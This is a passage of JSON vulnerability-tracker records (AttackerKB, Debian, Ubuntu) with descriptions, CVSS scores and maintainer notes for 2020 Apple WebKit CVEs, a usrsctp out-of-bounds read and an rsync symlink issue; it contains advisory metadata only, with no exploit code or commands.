"AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9819"], "modified": "2023-10-06T00:00:00", "id": "AKB:2D39FC31-C85A-47F1-BF8F-C7D3AB8A5505", "href": "https://attackerkb.com/topics/9avulTiaEO/cve-2020-9819", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-20T20:14:22", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A remote attacker may be able to cause arbitrary code execution.\n\n \n**Recent assessments:** \n \n**timwr** at September 04, 2020 9:14am UTC reported:\n\nThis exploit was used in pwn2own2020 and the exploit code is readily available.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-9850", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9850"], "modified": "2020-10-07T00:00:00", "id": "AKB:BC51026B-2BE3-44B4-BB8E-2FEAC9CE2DE6", "href": "https://attackerkb.com/topics/Iz19VmTdVV/cve-2020-9850", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-11-28T18:25:12", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "debiancve", "title": "CVE-2020-9802", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9802"], "modified": "2020-06-09T17:15:00", "id": "DEBIANCVE:CVE-2020-9802", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9802", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:25:12", "description": "A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "debiancve", "title": "CVE-2020-9803", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803"], "modified": "2020-06-09T17:15:00", "id": "DEBIANCVE:CVE-2020-9803", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9803", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:20:43", "description": "usrsctp before 2019-12-20 has out-of-bounds reads in sctp_load_addresses_from_init.", "cvss3": {"cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2020-03-06T20:15:12", "type": "debiancve", "title": "CVE-2019-20503", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20503"], "modified": "2020-03-06T20:15:12", "id": "DEBIANCVE:CVE-2019-20503", "href": "https://security-tracker.debian.org/tracker/CVE-2019-20503", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-28T18:25:13", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A remote attacker may be able to cause arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "debiancve", "title": "CVE-2020-9850", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9850"], "modified": "2020-06-09T17:15:00", "id": "DEBIANCVE:CVE-2020-9850", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9850", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:25:12", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "debiancve", "title": "CVE-2020-9806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9806"], "modified": "2020-06-09T17:15:00", "id": "DEBIANCVE:CVE-2020-9806", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9806", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T18:25:12", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "debiancve", "title": "CVE-2020-9807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9807"], "modified": "2020-06-09T17:15:00", "id": "DEBIANCVE:CVE-2020-9807", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9807", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-27T15:13:01", "description": "rsync 3.1.1 allows remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path.", "cvss3": {}, "published": "2015-02-12T16:59:00", "type": "debiancve", "title": "CVE-2014-9512", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512"], "modified": "2015-02-12T16:59:00", "id": "DEBIANCVE:CVE-2014-9512", "href": "https://security-tracker.debian.org/tracker/CVE-2014-9512", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-28T18:25:12", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to universal cross site scripting.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-06-09T17:15:00", "type": "debiancve", "title": "CVE-2020-9805", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9805"], "modified": "2020-06-09T17:15:00", "id": "DEBIANCVE:CVE-2020-9805", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9805", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-28T18:25:12", "description": "An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to a cross site scripting attack.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-06-09T17:15:00", "type": "debiancve", "title": "CVE-2020-9843", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9843"], "modified": "2020-06-09T17:15:00", "id": "DEBIANCVE:CVE-2020-9843", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9843", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-11-29T14:10:43", "description": "A logic issue was addressed with improved restrictions. This issue is fixed\nin iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1,\niTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows\n7.19. Processing maliciously crafted web content may lead to arbitrary code\nexecution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9802", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9802"], "modified": "2020-07-13T00:00:00", "id": "UB:CVE-2020-9802", "href": "https://ubuntu.com/security/CVE-2020-9802", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-29T14:10:41", "description": "A logic issue was addressed with improved restrictions. This issue is fixed\nin iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1,\niTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows\n7.19. A remote attacker may be able to cause arbitrary code execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9850", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9850"], "modified": "2020-07-13T00:00:00", "id": "UB:CVE-2020-9850", "href": "https://ubuntu.com/security/CVE-2020-9850", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T14:21:41", "description": "usrsctp before 2019-12-20 has out-of-bounds reads in\nsctp_load_addresses_from_init.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=953270>\n", "cvss3": {"cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2020-03-06T00:00:00", "type": "ubuntucve", "title": "CVE-2019-20503", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20503"], "modified": "2020-03-06T00:00:00", "id": "UB:CVE-2019-20503", "href": "https://ubuntu.com/security/CVE-2019-20503", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-29T14:10:42", "description": "A memory corruption issue was addressed with improved validation. This\nissue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5,\nSafari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud\nfor Windows 7.19. Processing maliciously crafted web content may lead to\narbitrary code execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9803", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803"], "modified": "2020-07-13T00:00:00", "id": "UB:CVE-2020-9803", "href": "https://ubuntu.com/security/CVE-2020-9803", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T14:18:13", "description": "An out-of-bounds read was addressed with improved bounds checking. This\nissue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS\n13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2,\niCloud for Windows 7.19. A malicious application may cause a denial of\nservice or potentially disclose memory contents.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | This may be an Apple-specific CVE, as of 2022-09-14, no details are available as to what the vulnerability is. Marking Ubuntu as not-affected.\n", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2020-06-09T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9794", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9794"], "modified": "2020-06-09T00:00:00", "id": "UB:CVE-2020-9794", "href": "https://ubuntu.com/security/CVE-2020-9794", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-11-29T14:10:42", "description": "A memory corruption issue was addressed with improved state management.\nThis issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS\n6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2,\niCloud for Windows 7.19. Processing maliciously crafted web content may\nlead to arbitrary code execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-13T00:00:00", "type": "ubuntucve", "title": "CVE-2020-9806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9806"], "modified": "2020-07-13T00:00:00", "id": "UB:CVE-2020-9806", "href": "https://ubuntu.com/security/CVE-2020-9806", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T15:23:56", "description": "rsync 3.1.1 allows remote attackers to write to arbitrary files via a\nsymlink attack on a file in the synchronization path.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/rsync/+bug/1531061>\n * <https://bugzilla.samba.org/show_bug.cgi?id=10977>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=778333>\n * <https://bugzilla.novell.com/show_bug.cgi?id=915410>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | rsync 3.1.1 introduced invalid filename filtering to prevent malicious servers from sending files outside of the specified directory: https://git.samba.org/?p=rsync.git;a=commit;h=4cad402ea8a91031f86c53961d78bb7f4f174790 CVE-2014-9512 is about malicious servers being able to bypass that filtering by changing paths. This is a security hardening feature that was added in 3.1.1. Either the whole feature needs to be backported to versions earlier than 3.1.1, or this issue doesn't apply to them. a second commit was later added: https://git.samba.org/rsync.git/?p=rsync.git;a=commit;h=e12a6c087ca1eecdb8eae5977be239c24f4dd3d9 packages in vivid+ claim that this CVE is fixed, but are missing the second commit\n", "cvss3": {}, "published": "2015-02-12T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9512", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 